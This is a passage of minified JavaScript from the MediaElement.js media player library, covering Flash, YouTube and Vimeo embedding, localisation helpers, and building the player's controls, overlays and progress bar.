id="'+m+'" name="'+m+'" play="true" loop="false" quality="high" bgcolor="#000000" wmode="transparent" allowScriptAccess="'+b.flashScriptAccess+'" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="//www.macromedia.com/go/getflashplayer" src="'+b.pluginPath+b.flashName+'" flashvars="'+i.join("&")+'" width="'+k+'" height="'+l+'" scale="default"class="mejs-shim"></embed>';break;case"youtube":var r;-1!=a.url.lastIndexOf("youtu.be")?(r=a.url.substr(a.url.lastIndexOf("/")+1),-1!=r.indexOf("?")&&(r=r.substr(0,r.indexOf("?")))):r=a.url.substr(a.url.lastIndexOf("=")+1),youtubeSettings={container:o,containerId:o.id,pluginMediaElement:n,pluginId:m,videoId:r,height:l,width:k,scheme:a.scheme},window.postMessage?mejs.YouTubeApi.enqueueIframe(youtubeSettings):mejs.PluginDetector.hasPluginVersion("flash",[10,0,0])&&mejs.YouTubeApi.createFlash(youtubeSettings,b);break;case"vimeo":var s=m+"_player";if(n.vimeoid=a.url.substr(a.url.lastIndexOf("/")+1),o.innerHTML='<iframe tabindex="-1" src="'+a.scheme+"player.vimeo.com/video/"+n.vimeoid+"?api=1&portrait=0&byline=0&title=0&player_id="+s+'" width="'+k+'" height="'+l+'" frameborder="0" class="mejs-shim" id="'+s+'" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>',"function"==typeof $f){var t=$f(o.childNodes[0]),u=-1;t.addEvent("ready",function(){function a(a,b,c,d){var e={type:c,target:b};"timeupdate"==c&&(b.currentTime=e.currentTime=d.seconds,b.duration=e.duration=d.duration),b.dispatchEvent(e)}t.playVideo=function(){t.api("play")},t.stopVideo=function(){t.api("unload")},t.pauseVideo=function(){t.api("pause")},t.seekTo=function(a){t.api("seekTo",a)},t.setVolume=function(a){t.api("setVolume",a)},t.setMuted=function(a){a?(t.lastVolume=t.api("getVolume"),t.api("setVolume",0)):(t.api("setVolume",t.lastVolume),delete t.lastVolume)},t.getPlayerState=function(){return u},t.addEvent("play",function(){u=1,a(t,n,"play"),a(t,n,"playing")}),t.addEvent("pause",function(){u=2,a(t,n,"pause")}),t.addEvent("finish",function(){u=0,a(t,n,"ended")}),t.addEvent("playProgress",function(b){a(t,n,"timeupdate",b)}),t.addEvent("seek",function(b){u=3,a(t,n,"seeked",b)}),t.addEvent("loadProgress",function(b){u=3,a(t,n,"progress",b)}),n.pluginElement=o,n.pluginApi=t,n.success(n,n.pluginElement)})}else console.warn("You need to include froogaloop for vimeo to work")}return j.style.display="none",j.removeAttribute("autoplay"),n},updateNative:function(a,b,c,d){var e,f=a.htmlMediaElement;for(e in mejs.HtmlMediaElement)f[e]=mejs.HtmlMediaElement[e];return b.success(f,f),f}},mejs.YouTubeApi={isIframeStarted:!1,isIframeLoaded:!1,loadIframeApi:function(a){if(!this.isIframeStarted){var b=document.createElement("script");b.src=a.scheme+"www.youtube.com/player_api";var c=document.getElementsByTagName("script")[0];c.parentNode.insertBefore(b,c),this.isIframeStarted=!0}},iframeQueue:[],enqueueIframe:function(a){this.isLoaded?this.createIframe(a):(this.loadIframeApi(a),this.iframeQueue.push(a))},createIframe:function(a){var b=a.pluginMediaElement,c=new YT.Player(a.containerId,{height:a.height,width:a.width,videoId:a.videoId,playerVars:{controls:0,wmode:"transparent"},events:{onReady:function(){c.setVideoSize=function(a,b){c.setSize(a,b)},a.pluginMediaElement.pluginApi=c,a.pluginMediaElement.pluginElement=document.getElementById(a.containerId),b.success(b,b.pluginElement),setInterval(function(){mejs.YouTubeApi.createEvent(c,b,"timeupdate")},250)},onStateChange:function(a){mejs.YouTubeApi.handleStateChange(a.data,c,b)}}})},createEvent:function(a,b,c){var d={type:c,target:b};if(a&&a.getDuration){b.currentTime=d.currentTime=a.getCurrentTime(),b.duration=d.duration=a.getDuration(),d.paused=b.paused,d.ended=b.ended,d.muted=a.isMuted(),d.volume=a.getVolume()/100,d.bytesTotal=a.getVideoBytesTotal(),d.bufferedBytes=a.getVideoBytesLoaded();var e=d.bufferedBytes/d.bytesTotal*d.duration;d.target.buffered=d.buffered={start:function(a){return 0},end:function(a){return e},length:1}}b.dispatchEvent(d)},iFrameReady:function(){for(this.isLoaded=!0,this.isIframeLoaded=!0;this.iframeQueue.length>0;){var a=this.iframeQueue.pop();this.createIframe(a)}},flashPlayers:{},createFlash:function(a){this.flashPlayers[a.pluginId]=a;var b,c=a.scheme+"www.youtube.com/apiplayer?enablejsapi=1&amp;playerapiid="+a.pluginId+"&amp;version=3&amp;autoplay=0&amp;controls=0&amp;modestbranding=1&loop=0&disablekb=1";mejs.MediaFeatures.isIE?(b=document.createElement("div"),a.container.appendChild(b),b.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="'+a.scheme+'download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="'+a.pluginId+'" width="'+a.width+'" height="'+a.height+'" class="mejs-shim"><param name="movie" value="'+c+'" /><param name="wmode" value="transparent" /><param name="allowScriptAccess" value="'+options.flashScriptAccess+'" /><param name="allowFullScreen" value="true" /></object>'):a.container.innerHTML='<object type="application/x-shockwave-flash" id="'+a.pluginId+'" data="'+c+'" width="'+a.width+'" height="'+a.height+'" style="visibility: visible; " class="mejs-shim"><param name="allowScriptAccess" value="'+options.flashScriptAccess+'"><param name="wmode" value="transparent"></object>'},flashReady:function(a){var b=this.flashPlayers[a],c=document.getElementById(a),d=b.pluginMediaElement;d.pluginApi=d.pluginElement=c,b.success(d,d.pluginElement),c.cueVideoById(b.videoId);var e=b.containerId+"_callback";window[e]=function(a){mejs.YouTubeApi.handleStateChange(a,c,d)},c.addEventListener("onStateChange",e),setInterval(function(){mejs.YouTubeApi.createEvent(c,d,"timeupdate")},250),mejs.YouTubeApi.createEvent(c,d,"canplay")},handleStateChange:function(a,b,c){switch(a){case-1:c.paused=!0,c.ended=!0,mejs.YouTubeApi.createEvent(b,c,"loadedmetadata");break;case 0:c.paused=!1,c.ended=!0,mejs.YouTubeApi.createEvent(b,c,"ended");break;case 1:c.paused=!1,c.ended=!1,mejs.YouTubeApi.createEvent(b,c,"play"),mejs.YouTubeApi.createEvent(b,c,"playing");break;case 2:c.paused=!0,c.ended=!1,mejs.YouTubeApi.createEvent(b,c,"pause");break;case 3:mejs.YouTubeApi.createEvent(b,c,"progress");break;case 5:}}},window.onYouTubePlayerAPIReady=function(){mejs.YouTubeApi.iFrameReady()},window.onYouTubePlayerReady=function(a){mejs.YouTubeApi.flashReady(a)},window.mejs=mejs,window.MediaElement=mejs.MediaElement,function(a,b,c){"use strict";var d={locale:{language:b.i18n&&b.i18n.locale.language||"",strings:b.i18n&&b.i18n.locale.strings||{}},ietf_lang_regex:/^(x\-)?[a-z]{2,}(\-\w{2,})?(\-\w{2,})?$/,methods:{}};d.getLanguage=function(){var a=d.locale.language||window.navigator.userLanguage||window.navigator.language;return d.ietf_lang_regex.exec(a)?a:null},"undefined"!=typeof mejsL10n&&(d.locale.language=mejsL10n.language),d.methods.checkPlain=function(a){var b,c,d={"&":"&amp;",'"':"&quot;","<":"&lt;",">":"&gt;"};a=String(a);for(b in d)d.hasOwnProperty(b)&&(c=new RegExp(b,"g"),a=a.replace(c,d[b]));return a},d.methods.t=function(a,b){return d.locale.strings&&d.locale.strings[b.context]&&d.locale.strings[b.context][a]&&(a=d.locale.strings[b.context][a]),d.methods.checkPlain(a)},d.t=function(a,b){if("string"==typeof a&&a.length>0){var c=d.getLanguage();return b=b||{context:c},d.methods.t(a,b)}throw{name:"InvalidArgumentException",message:"First argument is either not a string or empty."}},b.i18n=d}(document,mejs),function(a,b){"use strict";"undefined"!=typeof mejsL10n&&(a[mejsL10n.language]=mejsL10n.strings)}(mejs.i18n.locale.strings), /*! * * MediaElementPlayer * http://mediaelementjs.com/ * * Creates a controller bar for HTML5 <video> add <audio> tags * using jQuery and MediaElement.js (HTML5 Flash/Silverlight wrapper) * * Copyright 2010-2013, John Dyer (http://j.hn/) * License: MIT * */ "undefined"!=typeof jQuery?mejs.$=jQuery:"undefined"!=typeof Zepto?(mejs.$=Zepto,Zepto.fn.outerWidth=function(a){var b=$(this).width();return a&&(b+=parseInt($(this).css("margin-right"),10),b+=parseInt($(this).css("margin-left"),10)),b}):"undefined"!=typeof ender&&(mejs.$=ender),function(a){mejs.MepDefaults={poster:"",showPosterWhenEnded:!1,defaultVideoWidth:480,defaultVideoHeight:270,videoWidth:-1,videoHeight:-1,defaultAudioWidth:400,defaultAudioHeight:30,defaultSeekBackwardInterval:function(a){return.05*a.duration},defaultSeekForwardInterval:function(a){return.05*a.duration},setDimensions:!0,audioWidth:-1,audioHeight:-1,startVolume:.8,loop:!1,autoRewind:!0,enableAutosize:!0,timeFormat:"",alwaysShowHours:!1,showTimecodeFrameCount:!1,framesPerSecond:25,autosizeProgress:!0,alwaysShowControls:!1,hideVideoControlsOnLoad:!1,clickToPlayPause:!0,iPadUseNativeControls:!1,iPhoneUseNativeControls:!1,AndroidUseNativeControls:!1,features:["playpause","current","progress","duration","tracks","volume","fullscreen"],isVideo:!0,enableKeyboard:!0,pauseOtherPlayers:!0,keyActions:[{keys:[32,179],action:function(a,b){b.paused||b.ended?b.play():b.pause()}},{keys:[38],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.min(b.volume+.1,1);b.setVolume(c)}},{keys:[40],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.max(b.volume-.1,0);b.setVolume(c)}},{keys:[37,227],action:function(a,b){if(!isNaN(b.duration)&&b.duration>0){a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.max(b.currentTime-a.options.defaultSeekBackwardInterval(b),0);b.setCurrentTime(c)}}},{keys:[39,228],action:function(a,b){if(!isNaN(b.duration)&&b.duration>0){a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.min(b.currentTime+a.options.defaultSeekForwardInterval(b),b.duration);b.setCurrentTime(c)}}},{keys:[70],action:function(a,b){"undefined"!=typeof a.enterFullScreen&&(a.isFullScreen?a.exitFullScreen():a.enterFullScreen())}},{keys:[77],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer()),a.media.muted?a.setMuted(!1):a.setMuted(!0)}}]},mejs.mepIndex=0,mejs.players={},mejs.MediaElementPlayer=function(b,c){if(!(this instanceof mejs.MediaElementPlayer))return new mejs.MediaElementPlayer(b,c);var d=this;return d.$media=d.$node=a(b),d.node=d.media=d.$media[0],d.node?"undefined"!=typeof d.node.player?d.node.player:("undefined"==typeof c&&(c=d.$node.data("mejsoptions")),d.options=a.extend({},mejs.MepDefaults,c),d.options.timeFormat||(d.options.timeFormat="mm:ss",d.options.alwaysShowHours&&(d.options.timeFormat="hh:mm:ss"),d.options.showTimecodeFrameCount&&(d.options.timeFormat+=":ff")),mejs.Utility.calculateTimeFormat(0,d.options,d.options.framesPerSecond||25),d.id="mep_"+mejs.mepIndex++,mejs.players[d.id]=d,d.init(),d):void 0},mejs.MediaElementPlayer.prototype={hasFocus:!1,controlsAreVisible:!0,init:function(){var b=this,c=mejs.MediaFeatures,d=a.extend(!0,{},b.options,{success:function(a,c){b.meReady(a,c)},error:function(a){b.handleError(a)}}),e=b.media.tagName.toLowerCase();if(b.isDynamic="audio"!==e&&"video"!==e,b.isDynamic?b.isVideo=b.options.isVideo:b.isVideo="audio"!==e&&b.options.isVideo,c.isiPad&&b.options.iPadUseNativeControls||c.isiPhone&&b.options.iPhoneUseNativeControls)b.$media.attr("controls","controls"),c.isiPad&&null!==b.media.getAttribute("autoplay")&&b.play();else if(c.isAndroid&&b.options.AndroidUseNativeControls);else{b.$media.removeAttr("controls");var f=b.isVideo?mejs.i18n.t("Video Player"):mejs.i18n.t("Audio Player");a('<span class="mejs-offscreen">'+f+"</span>").insertBefore(b.$media),b.container=a('<div id="'+b.id+'" class="mejs-container '+(mejs.MediaFeatures.svgAsImg?"svg":"no-svg")+'" tabindex="0" role="application" aria-label="'+f+'"><div class="mejs-inner"><div class="mejs-mediaelement"></div><div class="mejs-layers"></div><div class="mejs-controls"></div><div class="mejs-clear"></div></div></div>').addClass(b.$media[0].className).insertBefore(b.$media).focus(function(a){if(!b.controlsAreVisible){b.showControls(!0);var c=b.container.find(".mejs-playpause-button > button");c.focus()}}),b.container.addClass((c.isAndroid?"mejs-android ":"")+(c.isiOS?"mejs-ios ":"")+(c.isiPad?"mejs-ipad ":"")+(c.isiPhone?"mejs-iphone ":"")+(b.isVideo?"mejs-video ":"mejs-audio ")),b.container.find(".mejs-mediaelement").append(b.$media),b.node.player=b,b.controls=b.container.find(".mejs-controls"),b.layers=b.container.find(".mejs-layers");var g=b.isVideo?"video":"audio",h=g.substring(0,1).toUpperCase()+g.substring(1);b.options[g+"Width"]>0||b.options[g+"Width"].toString().indexOf("%")>-1?b.width=b.options[g+"Width"]:""!==b.media.style.width&&null!==b.media.style.width?b.width=b.media.style.width:null!==b.media.getAttribute("width")?b.width=b.$media.attr("width"):b.width=b.options["default"+h+"Width"],b.options[g+"Height"]>0||b.options[g+"Height"].toString().indexOf("%")>-1?b.height=b.options[g+"Height"]:""!==b.media.style.height&&null!==b.media.style.height?b.height=b.media.style.height:null!==b.$media[0].getAttribute("height")?b.height=b.$media.attr("height"):b.height=b.options["default"+h+"Height"],b.setPlayerSize(b.width,b.height),d.pluginWidth=b.width,d.pluginHeight=b.height}mejs.MediaElement(b.$media[0],d),"undefined"!=typeof b.container&&b.controlsAreVisible&&b.container.trigger("controlsshown")},showControls:function(a){var b=this;a="undefined"==typeof a||a,b.controlsAreVisible||(a?(b.controls.removeClass("mejs-offscreen").stop(!0,!0).fadeIn(200,function(){b.controlsAreVisible=!0,b.container.trigger("controlsshown")}),b.container.find(".mejs-control").removeClass("mejs-offscreen").stop(!0,!0).fadeIn(200,function(){b.controlsAreVisible=!0})):(b.controls.removeClass("mejs-offscreen").css("display","block"),b.container.find(".mejs-control").removeClass("mejs-offscreen").css("display","block"),b.controlsAreVisible=!0,b.container.trigger("controlsshown")),b.setControlsSize())},hideControls:function(b){var c=this;b="undefined"==typeof b||b,!c.controlsAreVisible||c.options.alwaysShowControls||c.keyboardAction||(b?(c.controls.stop(!0,!0).fadeOut(200,function(){a(this).addClass("mejs-offscreen").css("display","block"),c.controlsAreVisible=!1,c.container.trigger("controlshidden")}),c.container.find(".mejs-control").stop(!0,!0).fadeOut(200,function(){a(this).addClass("mejs-offscreen").css("display","block")})):(c.controls.addClass("mejs-offscreen").css("display","block"),c.container.find(".mejs-control").addClass("mejs-offscreen").css("display","block"),c.controlsAreVisible=!1,c.container.trigger("controlshidden")))},controlsTimer:null,startControlsTimer:function(a){var b=this;a="undefined"!=typeof a?a:1500,b.killControlsTimer("start"),b.controlsTimer=setTimeout(function(){b.hideControls(),b.killControlsTimer("hide")},a)},killControlsTimer:function(a){var b=this;null!==b.controlsTimer&&(clearTimeout(b.controlsTimer),delete b.controlsTimer,b.controlsTimer=null)},controlsEnabled:!0,disableControls:function(){var a=this;a.killControlsTimer(),a.hideControls(!1),this.controlsEnabled=!1},enableControls:function(){var a=this;a.showControls(!1),a.controlsEnabled=!0},meReady:function(b,c){var d,e,f=this,g=mejs.MediaFeatures,h=c.getAttribute("autoplay"),i=!("undefined"==typeof h||null===h||"false"===h);if(!f.created){if(f.created=!0,f.media=b,f.domNode=c,!(g.isAndroid&&f.options.AndroidUseNativeControls||g.isiPad&&f.options.iPadUseNativeControls||g.isiPhone&&f.options.iPhoneUseNativeControls)){f.buildposter(f,f.controls,f.layers,f.media),f.buildkeyboard(f,f.controls,f.layers,f.media),f.buildoverlays(f,f.controls,f.layers,f.media),f.findTracks();for(d in f.options.features)if(e=f.options.features[d],f["build"+e])try{f["build"+e](f,f.controls,f.layers,f.media)}catch(j){}f.container.trigger("controlsready"),f.setPlayerSize(f.width,f.height),f.setControlsSize(),f.isVideo&&(mejs.MediaFeatures.hasTouch?f.$media.bind("touchstart",function(){f.controlsAreVisible?f.hideControls(!1):f.controlsEnabled&&f.showControls(!1)}):(f.clickToPlayPauseCallback=function(){f.options.clickToPlayPause&&(f.media.paused?f.play():f.pause())},f.media.addEventListener("click",f.clickToPlayPauseCallback,!1),f.container.bind("mouseenter",function(){f.controlsEnabled&&(f.options.alwaysShowControls||(f.killControlsTimer("enter"),f.showControls(),f.startControlsTimer(2500)))}).bind("mousemove",function(){f.controlsEnabled&&(f.controlsAreVisible||f.showControls(),f.options.alwaysShowControls||f.startControlsTimer(2500))}).bind("mouseleave",function(){f.controlsEnabled&&(f.media.paused||f.options.alwaysShowControls||f.startControlsTimer(1e3))})),f.options.hideVideoControlsOnLoad&&f.hideControls(!1),i&&!f.options.alwaysShowControls&&f.hideControls(),f.options.enableAutosize&&f.media.addEventListener("loadedmetadata",function(a){f.options.videoHeight<=0&&null===f.domNode.getAttribute("height")&&!isNaN(a.target.videoHeight)&&(f.setPlayerSize(a.target.videoWidth,a.target.videoHeight),f.setControlsSize(),f.media.setVideoSize(a.target.videoWidth,a.target.videoHeight))},!1)),b.addEventListener("play",function(){var a;for(a in mejs.players){var b=mejs.players[a];b.id==f.id||!f.options.pauseOtherPlayers||b.paused||b.ended||b.pause(),b.hasFocus=!1}f.hasFocus=!0},!1),f.media.addEventListener("ended",function(b){if(f.options.autoRewind)try{f.media.setCurrentTime(0),window.setTimeout(function(){a(f.container).find(".mejs-overlay-loading").parent().hide()},20)}catch(c){}f.media.pause(),f.setProgressRail&&f.setProgressRail(),f.setCurrentRail&&f.setCurrentRail(),f.options.loop?f.play():!f.options.alwaysShowControls&&f.controlsEnabled&&f.showControls()},!1),f.media.addEventListener("loadedmetadata",function(a){f.updateDuration&&f.updateDuration(),f.updateCurrent&&f.updateCurrent(),f.isFullScreen||(f.setPlayerSize(f.width,f.height),f.setControlsSize())},!1);var k=null;f.media.addEventListener("timeupdate",function(){k!==this.duration&&(k=this.duration,mejs.Utility.calculateTimeFormat(k,f.options,f.options.framesPerSecond||25),f.updateDuration&&f.updateDuration(),f.updateCurrent&&f.updateCurrent(),f.setControlsSize())},!1),f.container.focusout(function(b){if(b.relatedTarget){var c=a(b.relatedTarget);f.keyboardAction&&0===c.parents(".mejs-container").length&&(f.keyboardAction=!1,f.hideControls(!0))}}),setTimeout(function(){f.setPlayerSize(f.width,f.height),f.setControlsSize()},50),f.globalBind("resize",function(){f.isFullScreen||mejs.MediaFeatures.hasTrueNativeFullScreen&&document.webkitIsFullScreen||f.setPlayerSize(f.width,f.height),f.setControlsSize()}),"youtube"==f.media.pluginType&&(g.isiOS||g.isAndroid)&&(f.container.find(".mejs-overlay-play").hide(),f.container.find(".mejs-poster").hide())}i&&"native"==b.pluginType&&f.play(),f.options.success&&("string"==typeof f.options.success?window[f.options.success](f.media,f.domNode,f):f.options.success(f.media,f.domNode,f))}},handleError:function(a){var b=this;b.controls&&b.controls.hide(),b.options.error&&b.options.error(a)},setPlayerSize:function(b,c){var d=this;if(!d.options.setDimensions)return!1;if("undefined"!=typeof b&&(d.width=b),"undefined"!=typeof c&&(d.height=c),d.height.toString().indexOf("%")>0||"none"!==d.$node.css("max-width")&&"t.width"!==d.$node.css("max-width")||d.$node[0].currentStyle&&"100%"===d.$node[0].currentStyle.maxWidth){var e=function(){return d.isVideo?d.media.videoWidth&&d.media.videoWidth>0?d.media.videoWidth:null!==d.media.getAttribute("width")?d.media.getAttribute("width"):d.options.defaultVideoWidth:d.options.defaultAudioWidth}(),f=function(){return d.isVideo?d.media.videoHeight&&d.media.videoHeight>0?d.media.videoHeight:null!==d.media.getAttribute("height")?d.media.getAttribute("height"):d.options.defaultVideoHeight:d.options.defaultAudioHeight}(),g=d.container.parent().closest(":visible").width(),h=d.container.parent().closest(":visible").height(),i=d.isVideo||!d.options.autosizeProgress?parseInt(g*f/e,10):f;isNaN(i)&&(i=h),d.container.parent().length>0&&"body"===d.container.parent()[0].tagName.toLowerCase()&&(g=a(window).width(),i=a(window).height()),i&&g&&(d.container.width(g).height(i),d.$media.add(d.container.find(".mejs-shim")).width("100%").height("100%"),d.isVideo&&d.media.setVideoSize&&d.media.setVideoSize(g,i),d.layers.children(".mejs-layer").width("100%").height("100%"))}else d.container.width(d.width).height(d.height),d.layers.children(".mejs-layer").width(d.width).height(d.height)},setControlsSize:function(){var b=this,c=0,d=0,e=b.controls.find(".mejs-time-rail"),f=b.controls.find(".mejs-time-total"),g=e.siblings(),h=g.last(),i=null;if(b.container.is(":visible")&&e.length&&e.is(":visible")){b.options&&!b.options.autosizeProgress&&(d=parseInt(e.css("width"),10)),0!==d&&d||(g.each(function(){var b=a(this);"absolute"!=b.css("position")&&b.is(":visible")&&(c+=a(this).outerWidth(!0))}),d=b.controls.width()-c-(e.outerWidth(!0)-e.width()));do e.width(d),f.width(d-(f.outerWidth(!0)-f.width())),"absolute"!=h.css("position")&&(i=h.length?h.position():null,d--);while(null!==i&&i.top.toFixed(2)>0&&d>0);b.container.trigger("controlsresize")}},buildposter:function(b,c,d,e){var f=this,g=a('<div class="mejs-poster mejs-layer"></div>').appendTo(d),h=b.$media.attr("poster");""!==b.options.poster&&(h=b.options.poster),h?f.setPoster(h):g.hide(),e.addEventListener("play",function(){g.hide()},!1),b.options.showPosterWhenEnded&&b.options.autoRewind&&e.addEventListener("ended",function(){g.show()},!1)},setPoster:function(b){var c=this,d=c.container.find(".mejs-poster"),e=d.find("img");0===e.length&&(e=a('<img width="100%" height="100%" alt="" />').appendTo(d)),e.attr("src",b),d.css({"background-image":"url("+b+")"})},buildoverlays:function(b,c,d,e){var f=this;if(b.isVideo){var g=a('<div class="mejs-overlay mejs-layer"><div class="mejs-overlay-loading"><span></span></div></div>').hide().appendTo(d),h=a('<div class="mejs-overlay mejs-layer"><div class="mejs-overlay-error"></div></div>').hide().appendTo(d),i=a('<div class="mejs-overlay mejs-layer mejs-overlay-play"><div class="mejs-overlay-button"></div></div>').appendTo(d).bind("click",function(){f.options.clickToPlayPause&&e.paused&&e.play()});e.addEventListener("play",function(){i.hide(),g.hide(),c.find(".mejs-time-buffering").hide(),h.hide()},!1),e.addEventListener("playing",function(){i.hide(),g.hide(),c.find(".mejs-time-buffering").hide(),h.hide()},!1),e.addEventListener("seeking",function(){g.show(),c.find(".mejs-time-buffering").show()},!1),e.addEventListener("seeked",function(){g.hide(),c.find(".mejs-time-buffering").hide()},!1),e.addEventListener("pause",function(){mejs.MediaFeatures.isiPhone||i.show()},!1),e.addEventListener("waiting",function(){g.show(),c.find(".mejs-time-buffering").show()},!1),e.addEventListener("loadeddata",function(){g.show(),c.find(".mejs-time-buffering").show(),mejs.MediaFeatures.isAndroid&&(e.canplayTimeout=window.setTimeout(function(){if(document.createEvent){var a=document.createEvent("HTMLEvents");return a.initEvent("canplay",!0,!0),e.dispatchEvent(a)}},300))},!1),e.addEventListener("canplay",function(){g.hide(),c.find(".mejs-time-buffering").hide(),clearTimeout(e.canplayTimeout)},!1),e.addEventListener("error",function(a){f.handleError(a),g.hide(),i.hide(),h.show(),h.find(".mejs-overlay-error").html("Error loading this resource")},!1),e.addEventListener("keydown",function(a){f.onkeydown(b,e,a)},!1)}},buildkeyboard:function(b,c,d,e){var f=this;f.container.keydown(function(){f.keyboardAction=!0}),f.globalBind("keydown",function(c){return b.hasFocus=0!==a(c.target).closest(".mejs-container").length&&a(c.target).closest(".mejs-container").attr("id")===b.$media.closest(".mejs-container").attr("id"),f.onkeydown(b,e,c)}),f.globalBind("click",function(c){b.hasFocus=0!==a(c.target).closest(".mejs-container").length})},onkeydown:function(a,b,c){if(a.hasFocus&&a.options.enableKeyboard)for(var d=0,e=a.options.keyActions.length;e>d;d++)for(var f=a.options.keyActions[d],g=0,h=f.keys.length;h>g;g++)if(c.keyCode==f.keys[g])return"function"==typeof c.preventDefault&&c.preventDefault(),f.action(a,b,c.keyCode,c),!1;return!0},findTracks:function(){var b=this,c=b.$media.find("track");b.tracks=[],c.each(function(c,d){d=a(d),b.tracks.push({srclang:d.attr("srclang")?d.attr("srclang").toLowerCase():"",src:d.attr("src"),kind:d.attr("kind"),label:d.attr("label")||"",entries:[],isLoaded:!1})})},changeSkin:function(a){this.container[0].className="mejs-container "+a,this.setPlayerSize(this.width,this.height),this.setControlsSize()},play:function(){this.load(),this.media.play()},pause:function(){try{this.media.pause()}catch(a){}},load:function(){this.isLoaded||this.media.load(),this.isLoaded=!0},setMuted:function(a){this.media.setMuted(a)},setCurrentTime:function(a){this.media.setCurrentTime(a)},getCurrentTime:function(){return this.media.currentTime},setVolume:function(a){this.media.setVolume(a)},getVolume:function(){return this.media.volume},setSrc:function(a){this.media.setSrc(a)},remove:function(){var a,b,c=this;c.container.prev(".mejs-offscreen").remove();for(a in c.options.features)if(b=c.options.features[a],c["clean"+b])try{c["clean"+b](c)}catch(d){}c.isDynamic?c.$node.insertBefore(c.container):(c.$media.prop("controls",!0),c.$node.clone().insertBefore(c.container).show(),c.$node.remove()),"native"!==c.media.pluginType&&c.media.remove(),delete mejs.players[c.id],"object"==typeof c.container&&c.container.remove(),c.globalUnbind(),delete c.node.player},rebuildtracks:function(){var a=this;a.findTracks(),a.buildtracks(a,a.controls,a.layers,a.media)},resetSize:function(){var a=this;setTimeout(function(){a.setPlayerSize(a.width,a.height),a.setControlsSize()},50)}},function(){function b(b,d){var e={d:[],w:[]};return a.each((b||"").split(" "),function(a,b){var f=b+"."+d;0===f.indexOf(".")?(e.d.push(f),e.w.push(f)):e[c.test(b)?"w":"d"].push(f)}),e.d=e.d.join(" "),e.w=e.w.join(" "),e}var c=/^((after|before)print|(before)?unload|hashchange|message|o(ff|n)line|page(hide|show)|popstate|resize|storage)\b/;mejs.MediaElementPlayer.prototype.globalBind=function(c,d,e){var f=this,g=f.node?f.node.ownerDocument:document;c=b(c,f.id),c.d&&a(g).bind(c.d,d,e),c.w&&a(window).bind(c.w,d,e)},mejs.MediaElementPlayer.prototype.globalUnbind=function(c,d){var e=this,f=e.node?e.node.ownerDocument:document;c=b(c,e.id),c.d&&a(f).unbind(c.d,d),c.w&&a(window).unbind(c.w,d)}}(),"undefined"!=typeof a&&(a.fn.mediaelementplayer=function(b){return b===!1?this.each(function(){var b=a(this).data("mediaelementplayer");b&&b.remove(),a(this).removeData("mediaelementplayer")}):this.each(function(){a(this).data("mediaelementplayer",new mejs.MediaElementPlayer(this,b))}),this},a(document).ready(function(){a(".mejs-player").mediaelementplayer()})),window.MediaElementPlayer=mejs.MediaElementPlayer}(mejs.$),function(a){a.extend(mejs.MepDefaults,{playText:mejs.i18n.t("Play"),pauseText:mejs.i18n.t("Pause")}),a.extend(MediaElementPlayer.prototype,{buildplaypause:function(b,c,d,e){function f(a){"play"===a?(i.removeClass("mejs-play").addClass("mejs-pause"),j.attr({title:h.pauseText,"aria-label":h.pauseText})):(i.removeClass("mejs-pause").addClass("mejs-play"),j.attr({title:h.playText,"aria-label":h.playText}))}var g=this,h=g.options,i=a('<div class="mejs-button mejs-playpause-button mejs-play" ><button type="button" aria-controls="'+g.id+'" title="'+h.playText+'" aria-label="'+h.playText+'"></button></div>').appendTo(c).click(function(a){return a.preventDefault(),e.paused?e.play():e.pause(),!1}),j=i.find("button");f("pse"),e.addEventListener("play",function(){f("play")},!1),e.addEventListener("playing",function(){f("play")},!1),e.addEventListener("pause",function(){f("pse")},!1),e.addEventListener("paused",function(){f("pse")},!1)}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{stopText:"Stop"}),a.extend(MediaElementPlayer.prototype,{buildstop:function(b,c,d,e){var f=this;a('<div class="mejs-button mejs-stop-button mejs-stop"><button type="button" aria-controls="'+f.id+'" title="'+f.options.stopText+'" aria-label="'+f.options.stopText+'"></button></div>').appendTo(c).click(function(){e.paused||e.pause(),e.currentTime>0&&(e.setCurrentTime(0),e.pause(),c.find(".mejs-time-current").width("0px"),c.find(".mejs-time-handle").css("left","0px"),c.find(".mejs-time-float-current").html(mejs.Utility.secondsToTimeCode(0,b.options)),c.find(".mejs-currenttime").html(mejs.Utility.secondsToTimeCode(0,b.options)),d.find(".mejs-poster").show())})}})}(mejs.$),function(a){a.extend(mejs.MepDefaults,{progessHelpText:mejs.i18n.t("Use Left/Right Arrow keys to advance one second, Up/Down arrows to advance ten seconds.")}),a.extend(MediaElementPlayer.prototype,{buildprogress:function(b,c,d,e){a('<div class="mejs-time-rail"><span class="mejs-time-total mejs-time-slider"><span class="mejs-time-buffering"></span><span class="mejs-time-loaded"></span><span class="mejs-time-current"></span><span class="mejs-time-handle"></span><span class="mejs-time-float"><span class="mejs-time-float-current">00:00</span><span class="mejs-time-float-corner"></span></span></span></div>').appendTo(c),c.find(".mejs-time-buffering").hide();var f=this,g=c.find(".mejs-time-total"),h=c.find(".mejs-time-loaded"),i=c.find(".mejs-time-current"),j=c.find(".mejs-time-handle"),k=c.find(".mejs-time-float"),l=c.find(".mejs-time-float-current"),m=c.find(".mejs-time-slider"),n=function(a){var c,d=g.offset(),f=g.width(),h=0,i=0,j=0;c=a.originalEvent&&a.originalEvent.changedTouches?a.originalEvent.changedTouches[0].pageX:a.changedTouches?a.changedTouches[0].pageX:a.pageX,e.duration&&(c<d.left?c=d.left:c>f+d.left&&(c=f+d.left),j=c-d.left,h=j/f,i=.02>=h?0:h*e.duration,o&&i!==e.currentTime&&e.setCurrentTime(i),mejs.MediaFeatures.hasTouch||(k.css("left",j),l.html(mejs.Utility.secondsToTimeCode(i,b.options)),k.show()))},o=!1,p=!1,q=0,r=!1,s=b.options.autoRewind,t=function(a){var c=e.currentTime,d=mejs.i18n.t("Time 